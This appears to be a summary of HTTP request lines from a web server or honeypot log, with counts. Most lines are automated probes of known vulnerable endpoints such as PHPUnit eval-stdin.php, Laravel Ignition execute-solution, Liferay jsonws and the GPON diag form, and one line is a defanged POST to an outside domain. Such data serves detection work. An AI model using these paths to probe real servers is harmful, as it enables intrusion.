1	HEAD	/	HTTP/1.1
1	OPTIONS	*	HTTP/1.1
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
2	POST	/_ignition/execute-solution	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
4	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//grzej[.]xyz/364f12a9155b7fef707f691958e3d1a5d8e7333205712ad7a28965aec1e8f71196b38f0608963e60ae414da51c3a8948f5675d2bf4542619dc516b2cdf124a58c945257a4ccd55a6401056ab217f28ed17eba55c7bba6d746ecbd4060b00f1f0	HTTP/1.1